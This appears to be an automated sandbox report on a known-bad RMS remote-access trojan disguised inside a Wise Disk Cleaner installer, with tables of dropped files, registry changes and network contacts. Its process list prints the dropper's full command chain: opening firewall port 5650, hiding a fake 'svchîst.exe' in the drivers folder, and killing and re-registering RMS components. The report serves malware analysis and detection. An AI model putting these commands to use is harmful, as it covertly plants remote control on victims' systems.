Analysis Overview
SHA256
63119ab29e258e4828893f60f39cf278e2a4e69fd1886ee71e14b98091b4d443
Threat Level: Known bad
The file 63119ab29e258e4828893f60f39cf278e2a4e69fd1886ee71e14b98091b4d443 was found to be: Known bad.
Malicious Activity Summary
RMS
Drops file in Drivers directory
Modifies Windows Firewall
Executes dropped EXE
Reads user/profile data of web browsers
Loads dropped DLL
Checks computer location settings
Checks for any installed AV software in registry
Checks installed software on the system
Enumerates connected drives
Drops file in System32 directory
Drops file in Program Files directory
Enumerates physical storage devices
Runs ping.exe
Suspicious use of WriteProcessMemory
Suspicious use of SetWindowsHookEx
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: EnumeratesProcesses
Suspicious use of FindShellTrayWindow
Views/modifies file attributes
Modifies registry class
Modifies Internet Explorer settings
Kills process with taskkill
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2022-04-17 07:06
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2022-04-17 07:06
Reported
2022-04-17 07:08
Platform
win7-20220414-en
Max time kernel
148s
Max time network
154s
Command Line
Signatures
RMS
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\SysWOW64\drivers\install.exe | C:\Users\Admin\AppData\Local\Temp\63119ab29e258e4828893f60f39cf278e2a4e69fd1886ee71e14b98091b4d443.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\drivers\ssleay32.dll | C:\Users\Admin\AppData\Local\Temp\63119ab29e258e4828893f60f39cf278e2a4e69fd1886ee71e14b98091b4d443.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\drivers\libeay32.dll | C:\Users\Admin\AppData\Local\Temp\63119ab29e258e4828893f60f39cf278e2a4e69fd1886ee71e14b98091b4d443.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\drivers\svchîst.exe | C:\Users\Admin\AppData\Local\Temp\63119ab29e258e4828893f60f39cf278e2a4e69fd1886ee71e14b98091b4d443.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\drivers\svchîst.exe | C:\Windows\SysWOW64\attrib.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\drivers\install.exe | C:\Windows\SysWOW64\attrib.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Wise Disk Cleaner\10.3.6.788\setup.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-I2F6H.tmp\setup.tmp | N/A |
| N/A | N/A | C:\Windows\SysWOW64\drivers\install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-KQKMN.tmp\CSTask.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Wise\Wise Disk Cleaner\WiseDiskCleaner.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\drivers\svchîst.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\drivers\svchîst.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\drivers\svchîst.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\drivers\svchîst.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\drivers\svchîst.exe | N/A |
Modifies Windows Firewall
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\drivers\svchîst.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\drivers\svchîst.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\drivers\svchîst.exe | N/A |
Loads dropped DLL
Reads user/profile data of web browsers
Checks for any installed AV software in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\software\Wow6432Node\avast software\avast | C:\Program Files (x86)\Wise\Wise Disk Cleaner\WiseDiskCleaner.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000\software\avast software\avast | C:\Program Files (x86)\Wise\Wise Disk Cleaner\WiseDiskCleaner.exe | N/A |
| Key opened | \REGISTRY\MACHINE\software\avira\antivir desktop | C:\Program Files (x86)\Wise\Wise Disk Cleaner\WiseDiskCleaner.exe | N/A |
| Key opened | \REGISTRY\MACHINE\software\Wow6432Node\avira\antivir desktop | C:\Program Files (x86)\Wise\Wise Disk Cleaner\WiseDiskCleaner.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000\software\avira\antivirus | C:\Program Files (x86)\Wise\Wise Disk Cleaner\WiseDiskCleaner.exe | N/A |
| Key opened | \REGISTRY\MACHINE\software\avast software\avast | C:\Program Files (x86)\Wise\Wise Disk Cleaner\WiseDiskCleaner.exe | N/A |
Checks installed software on the system
Enumerates connected drives
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\SysWOW64\idfgvgjnghcdfb.reg | C:\Windows\SysWOW64\attrib.exe | N/A |
| File created | C:\Windows\SysWOW64\idfgvgjnghcdfb.reg | C:\Windows\SysWOW64\cmd.exe | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-5C1N5.tmp | C:\Users\Admin\AppData\Local\Temp\is-I2F6H.tmp\setup.tmp | N/A |
| File created | C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-OPTGD.tmp | C:\Users\Admin\AppData\Local\Temp\is-I2F6H.tmp\setup.tmp | N/A |
| File created | C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-GAOA0.tmp | C:\Users\Admin\AppData\Local\Temp\is-I2F6H.tmp\setup.tmp | N/A |
| File created | C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-G72EI.tmp | C:\Users\Admin\AppData\Local\Temp\is-I2F6H.tmp\setup.tmp | N/A |
| File created | C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-F6O34.tmp | C:\Users\Admin\AppData\Local\Temp\is-I2F6H.tmp\setup.tmp | N/A |
| File created | C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-32O7J.tmp | C:\Users\Admin\AppData\Local\Temp\is-I2F6H.tmp\setup.tmp | N/A |
| File created | C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-BG8EL.tmp | C:\Users\Admin\AppData\Local\Temp\is-I2F6H.tmp\setup.tmp | N/A |
| File created | C:\Program Files (x86)\Wise\Wise Disk Cleaner\is-6PI5S.tmp | C:\Users\Admin\AppData\Local\Temp\is-I2F6H.tmp\setup.tmp | N/A |
| File created | C:\Program Files (x86)\Wise\Wise Disk Cleaner\unins000.dat | C:\Users\Admin\AppData\Local\Temp\is-I2F6H.tmp\setup.tmp | N/A |
| File created | C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-75449.tmp | C:\Users\Admin\AppData\Local\Temp\is-I2F6H.tmp\setup.tmp | N/A |
| File created | C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-KFGUG.tmp | C:\Users\Admin\AppData\Local\Temp\is-I2F6H.tmp\setup.tmp | N/A |
| File created | C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-58M2H.tmp | C:\Users\Admin\AppData\Local\Temp\is-I2F6H.tmp\setup.tmp | N/A |
| File created | C:\Program Files (x86)\Wise\Wise Disk Cleaner\is-V319U.tmp | C:\Users\Admin\AppData\Local\Temp\is-I2F6H.tmp\setup.tmp | N/A |
| File created | C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-VQBJ1.tmp | C:\Users\Admin\AppData\Local\Temp\is-I2F6H.tmp\setup.tmp | N/A |
| File created | C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-0O9PS.tmp | C:\Users\Admin\AppData\Local\Temp\is-I2F6H.tmp\setup.tmp | N/A |
| File created | C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-KRLI7.tmp | C:\Users\Admin\AppData\Local\Temp\is-I2F6H.tmp\setup.tmp | N/A |
| File created | C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-PG44I.tmp | C:\Users\Admin\AppData\Local\Temp\is-I2F6H.tmp\setup.tmp | N/A |
| File created | C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-M18G2.tmp | C:\Users\Admin\AppData\Local\Temp\is-I2F6H.tmp\setup.tmp | N/A |
| File created | C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-1HUTB.tmp | C:\Users\Admin\AppData\Local\Temp\is-I2F6H.tmp\setup.tmp | N/A |
| File created | C:\Program Files (x86)\Wise\Wise Disk Cleaner\is-SQ5H1.tmp | C:\Users\Admin\AppData\Local\Temp\is-I2F6H.tmp\setup.tmp | N/A |
| File created | C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-LMQEF.tmp | C:\Users\Admin\AppData\Local\Temp\is-I2F6H.tmp\setup.tmp | N/A |
| File created | C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-U4MAS.tmp | C:\Users\Admin\AppData\Local\Temp\is-I2F6H.tmp\setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\Wise\Wise Disk Cleaner\WiseDefrag.dll | C:\Users\Admin\AppData\Local\Temp\is-I2F6H.tmp\setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\Wise\Wise Disk Cleaner\WiseDiskCleaner.exe | C:\Users\Admin\AppData\Local\Temp\is-I2F6H.tmp\setup.tmp | N/A |
| File created | C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-D451B.tmp | C:\Users\Admin\AppData\Local\Temp\is-I2F6H.tmp\setup.tmp | N/A |
| File created | C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-5UE2M.tmp | C:\Users\Admin\AppData\Local\Temp\is-I2F6H.tmp\setup.tmp | N/A |
| File created | C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-2H65H.tmp | C:\Users\Admin\AppData\Local\Temp\is-I2F6H.tmp\setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\Wise\Wise Disk Cleaner\LiveUpdate.exe | C:\Users\Admin\AppData\Local\Temp\is-I2F6H.tmp\setup.tmp | N/A |
| File created | C:\Program Files (x86)\Wise\Wise Disk Cleaner\is-DR5QR.tmp | C:\Users\Admin\AppData\Local\Temp\is-I2F6H.tmp\setup.tmp | N/A |
| File created | C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-UADDU.tmp | C:\Users\Admin\AppData\Local\Temp\is-I2F6H.tmp\setup.tmp | N/A |
| File created | C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-U916K.tmp | C:\Users\Admin\AppData\Local\Temp\is-I2F6H.tmp\setup.tmp | N/A |
| File created | C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-2GBAA.tmp | C:\Users\Admin\AppData\Local\Temp\is-I2F6H.tmp\setup.tmp | N/A |
| File created | C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-AUIT8.tmp | C:\Users\Admin\AppData\Local\Temp\is-I2F6H.tmp\setup.tmp | N/A |
| File created | C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-CNFVQ.tmp | C:\Users\Admin\AppData\Local\Temp\is-I2F6H.tmp\setup.tmp | N/A |
| File created | C:\Program Files (x86)\Wise\Wise Disk Cleaner\is-6VCB3.tmp | C:\Users\Admin\AppData\Local\Temp\is-I2F6H.tmp\setup.tmp | N/A |
| File created | C:\Program Files (x86)\Wise\Wise Disk Cleaner\is-GNDOM.tmp | C:\Users\Admin\AppData\Local\Temp\is-I2F6H.tmp\setup.tmp | N/A |
| File created | C:\Program Files (x86)\Wise\Wise Disk Cleaner\is-7JUR2.tmp | C:\Users\Admin\AppData\Local\Temp\is-I2F6H.tmp\setup.tmp | N/A |
| File created | C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-9EEKT.tmp | C:\Users\Admin\AppData\Local\Temp\is-I2F6H.tmp\setup.tmp | N/A |
| File created | C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-2DRG1.tmp | C:\Users\Admin\AppData\Local\Temp\is-I2F6H.tmp\setup.tmp | N/A |
| File created | C:\Program Files (x86)\Wise\Wise Disk Cleaner\unins000.msg | C:\Users\Admin\AppData\Local\Temp\is-I2F6H.tmp\setup.tmp | N/A |
| File created | C:\Program Files (x86)\Wise\Wise Disk Cleaner\is-G2VSA.tmp | C:\Users\Admin\AppData\Local\Temp\is-I2F6H.tmp\setup.tmp | N/A |
| File created | C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-K876C.tmp | C:\Users\Admin\AppData\Local\Temp\is-I2F6H.tmp\setup.tmp | N/A |
| File created | C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-DVIBG.tmp | C:\Users\Admin\AppData\Local\Temp\is-I2F6H.tmp\setup.tmp | N/A |
| File created | C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-73D7Q.tmp | C:\Users\Admin\AppData\Local\Temp\is-I2F6H.tmp\setup.tmp | N/A |
| File created | C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-87CMC.tmp | C:\Users\Admin\AppData\Local\Temp\is-I2F6H.tmp\setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\Wise\Wise Disk Cleaner\sqlite3.dll | C:\Users\Admin\AppData\Local\Temp\is-I2F6H.tmp\setup.tmp | N/A |
| File created | C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-0QECA.tmp | C:\Users\Admin\AppData\Local\Temp\is-I2F6H.tmp\setup.tmp | N/A |
| File created | C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-Q04IE.tmp | C:\Users\Admin\AppData\Local\Temp\is-I2F6H.tmp\setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\Wise\Wise Disk Cleaner\unins000.dat | C:\Users\Admin\AppData\Local\Temp\is-I2F6H.tmp\setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\Wise\Wise Disk Cleaner\WJSLib.dll | C:\Users\Admin\AppData\Local\Temp\is-I2F6H.tmp\setup.tmp | N/A |
| File created | C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-LM4UH.tmp | C:\Users\Admin\AppData\Local\Temp\is-I2F6H.tmp\setup.tmp | N/A |
| File created | C:\Program Files (x86)\Wise\Wise Disk Cleaner\is-8J92D.tmp | C:\Users\Admin\AppData\Local\Temp\is-I2F6H.tmp\setup.tmp | N/A |
| File created | C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-POD21.tmp | C:\Users\Admin\AppData\Local\Temp\is-I2F6H.tmp\setup.tmp | N/A |
| File created | C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-86RQ9.tmp | C:\Users\Admin\AppData\Local\Temp\is-I2F6H.tmp\setup.tmp | N/A |
| File created | C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-8PIBV.tmp | C:\Users\Admin\AppData\Local\Temp\is-I2F6H.tmp\setup.tmp | N/A |
| File created | C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-BFDUC.tmp | C:\Users\Admin\AppData\Local\Temp\is-I2F6H.tmp\setup.tmp | N/A |
| File created | C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-J1CUS.tmp | C:\Users\Admin\AppData\Local\Temp\is-I2F6H.tmp\setup.tmp | N/A |
Enumerates physical storage devices
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_BROWSER_EMULATION | C:\Program Files (x86)\Wise\Wise Disk Cleaner\WiseDiskCleaner.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_BROWSER_EMULATION\WiseDiskCleaner.exe = "11000" | C:\Program Files (x86)\Wise\Wise Disk Cleaner\WiseDiskCleaner.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\.gz\General = [hex data] | C:\Windows\SysWOW64\drivers\install.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.gz\FUSClientPath = "C:\\Windows\\SysWOW64\\drivers\\maskhostex.exe" | C:\Windows\SysWOW64\drivers\svchîst.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\.gz\General = [hex data] | C:\Windows\SysWOW64\drivers\svchîst.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\.gz\Certificates = [hex data] | C:\Windows\SysWOW64\drivers\svchîst.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\.gz\notification = [hex data] | C:\Windows\SysWOW64\drivers\install.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\.gz\InternetId = [hex data] | C:\Windows\SysWOW64\drivers\svchîst.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\.gz\CalendarRecordSettings = [hex data] | C:\Windows\SysWOW64\drivers\svchîst.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\.gz\InternetId = [hex data] | C:\Windows\SysWOW64\drivers\svchîst.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\.gz\General = [hex data] | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.gz | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\.gz\notification = [hex data] | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.gz | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\.gz\Security = [hex data] | C:\Windows\SysWOW64\drivers\svchîst.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\.gz\General = [hex data] | C:\Windows\SysWOW64\drivers\svchîst.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\.gz\Security = [hex data] | C:\Windows\SysWOW64\drivers\install.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.gz | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\.gz\Security = [hex data] | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.gz\ | C:\Windows\SysWOW64\drivers\svchîst.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.gz | C:\Windows\SysWOW64\drivers\install.exe | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\drivers\svchîst.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Program Files (x86)\Wise\Wise Disk Cleaner\WiseDiskCleaner.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Program Files (x86)\Wise\Wise Disk Cleaner\WiseDiskCleaner.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Program Files (x86)\Wise\Wise Disk Cleaner\WiseDiskCleaner.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\drivers\svchîst.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\drivers\svchîst.exe | N/A |
| Token: SeTcbPrivilege | N/A | C:\Windows\SysWOW64\drivers\svchîst.exe | N/A |
| Token: SeTcbPrivilege | N/A | C:\Windows\SysWOW64\drivers\svchîst.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-I2F6H.tmp\setup.tmp | N/A |
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\63119ab29e258e4828893f60f39cf278e2a4e69fd1886ee71e14b98091b4d443.exe
"C:\Users\Admin\AppData\Local\Temp\63119ab29e258e4828893f60f39cf278e2a4e69fd1886ee71e14b98091b4d443.exe"
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im rutserv.exe
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\DNS-Service\Parameters\AppExit" /t REG_SZ /d "Restart" /f
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im rfusclient.exe
C:\Windows\SysWOW64\netsh.exe
netsh firewall add portopening TCP 5650 "Open Port 5650"
C:\Users\Admin\AppData\Local\Temp\is-I2F6H.tmp\setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-I2F6H.tmp\setup.tmp" /SL5="$201A8,3793825,188928,C:\Users\Admin\AppData\Local\Temp\Wise Disk Cleaner\10.3.6.788\setup.exe" /VERYSILENT /LANG=ru /TASKS=desktopicon
C:\Windows\SysWOW64\reg.exe
reg delete "HKLM\SYSTEM\Remote Manipulator System" /f
C:\Users\Admin\AppData\Local\Temp\Wise Disk Cleaner\10.3.6.788\setup.exe
"C:\Users\Admin\AppData\Local\Temp\Wise Disk Cleaner\10.3.6.788\setup.exe" /VERYSILENT /LANG=ru /TASKS=desktopicon
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\DNS-Service" /v FailureActions /t REG_BINARY /d 0000000000000000000000000300000057005300010000000000000001000000000000000100000000000000 /f
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\DNS-Service\Parameters\AppExit" /t REG_SZ /d "Restart" /f& REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\DNS-Service" /v FailureActions /t REG_BINARY /d 0000000000000000000000000300000057005300010000000000000001000000000000000100000000000000 /f& Exit
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c if exist "%SYSTEMROOT%\System32\idfgvgjnghcdfb.reg" (goto& cd %SYSTEMROOT%\System32\drivers& attrib +h +s "svchîst.exe"& attrib -h -s "install.exe"& del /f /q "install.exe"& attrib -h -s "install.cmd"& del /f /q "install.cmd"& Exit) else taskkill /f /im rutserv.exe& taskkill /f /im rfusclient.exe& reg delete "HKLM\SYSTEM\Remote Manipulator System" /f& netsh firewall add portopening TCP 5650 "Open Port 5650"& netsh advfirewall firewall add rule name="Open Port 5650" dir=in action=allow protocol=TCP localport=5650& "%SYSTEMROOT%\System32\drivers\install.exe"& ping 127.0.0.1& "%SYSTEMROOT%\System32\drivers\svchîst.exe" /silentinstall&"%SYSTEMROOT%\System32\drivers\svchîst.exe" /firewall& "%SYSTEMROOT%\System32\drivers\svchîst.exe" /start& Echo Windows Registry Editor Version 5.00> %SYSTEMROOT%\System32\idfgvgjnghcdfb.reg& attrib +h +s "%SYSTEMROOT%\System32\idfgvgjnghcdfb.reg"& cd %SYSTEMROOT%\System32\drivers& attrib +h +s "svchîst.exe"& attrib -h -s "install.exe"& del /f /q "install.exe"& attrib -h -s "install.cmd"& del /f /q "install.cmd"& Exit
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="Open Port 5650" dir=in action=allow protocol=TCP localport=5650
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c REG ADD "HKLM\SOFTWARE\Classes\.gz" /v General /t REG_BINARY /d [hex data] /f
C:\Windows\SysWOW64\reg.exe
reg delete "HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\installer 20.0.37920.2020" /f
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Classes\.gz" /v Security /t REG_BINARY /d [hex data omitted] /f
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Classes\.gz" /v General /t REG_BINARY /d [hex data omitted] /f
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Classes\.gz" /v notification /t REG_BINARY /d [hex data omitted] /f
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg delete "HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\installer 20.0.37920.2020" /f
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c REG ADD "HKLM\SOFTWARE\Classes\.gz" /v Security /t REG_BINARY /d [hex data omitted] /f
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c REG ADD "HKLM\SOFTWARE\Classes\.gz" /v notification /t REG_BINARY /d [hex data omitted] /f
C:\Windows\SysWOW64\drivers\install.exe
"C:\Windows\System32\drivers\install.exe"
C:\Users\Admin\AppData\Local\Temp\is-KQKMN.tmp\CSTask.exe
"C:\Users\Admin\AppData\Local\Temp\is-KQKMN.tmp\CSTask.exe" "WDCSkipUAC" "C:\Program Files (x86)\Wise\Wise Disk Cleaner\WiseDiskCleaner.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg delete "HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Wise Disk Cleaner 10.3.6.788" /f
C:\Windows\SysWOW64\reg.exe
reg delete "HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Wise Disk Cleaner 10.3.6.788" /f
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c RMDIR /s/q "C:\Users\Admin\AppData\Local\Temp\Wise Disk Cleaner"
C:\Windows\SysWOW64\attrib.exe
attrib -h -s -r "C:\Users\Admin\AppData\Local\Temp\Wise Disk Cleaner\10.3.6.788\*.*"
C:\Windows\SysWOW64\drivers\svchîst.exe
"C:\Windows\System32\drivers\svchîst.exe" /silentinstall
C:\Program Files (x86)\Wise\Wise Disk Cleaner\WiseDiskCleaner.exe
"C:\Program Files (x86)\Wise\Wise Disk Cleaner\WiseDiskCleaner.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c attrib -h -s -r "C:\Users\Admin\AppData\Local\Temp\Wise Disk Cleaner\10.3.6.788\*.*"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c "C:\Program Files\Wise\Wise Disk Cleaner\WiseDiskCleaner.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c "C:\Program Files (x86)\Wise\Wise Disk Cleaner\WiseDiskCleaner.exe"
C:\Windows\SysWOW64\drivers\svchîst.exe
"C:\Windows\System32\drivers\svchîst.exe" /firewall
C:\Windows\SysWOW64\drivers\svchîst.exe
"C:\Windows\System32\drivers\svchîst.exe" /start
C:\Windows\SysWOW64\drivers\svchîst.exe
"C:\Windows\SysWOW64\drivers\svchîst.exe"
C:\Windows\SysWOW64\attrib.exe
attrib +h +s "C:\Windows\System32\idfgvgjnghcdfb.reg"
C:\Windows\SysWOW64\attrib.exe
attrib -h -s "install.cmd"
C:\Windows\SysWOW64\attrib.exe
attrib -h -s "install.exe"
C:\Windows\SysWOW64\attrib.exe
attrib +h +s "svchîst.exe"
C:\Windows\SysWOW64\drivers\svchîst.exe
C:\Windows\SysWOW64\drivers\svchîst.exe -firewall
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | www.wisecleaner.net | udp |
| US | 23.224.25.141:80 | www.wisecleaner.net | tcp |
| US | 8.8.8.8:53 | info.wisecleaner.com | udp |
| US | 8.8.8.8:53 | www.wisecleaner.net | udp |
| US | 104.26.2.143:80 | info.wisecleaner.com | tcp |
| US | 23.224.25.141:80 | www.wisecleaner.net | tcp |
| US | 104.26.2.143:80 | info.wisecleaner.com | tcp |
| US | 8.8.8.8:53 | smtp.spaceweb.ru | udp |
| RU | 77.222.41.129:25 | smtp.spaceweb.ru | tcp |
| US | 8.8.8.8:53 | rms-server.tektonit.ru | udp |
| RU | 95.213.205.83:5655 | rms-server.tektonit.ru | tcp |
| RU | 77.223.124.212:5655 | | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\Wise Disk Cleaner\10.3.6.788\setup.exe
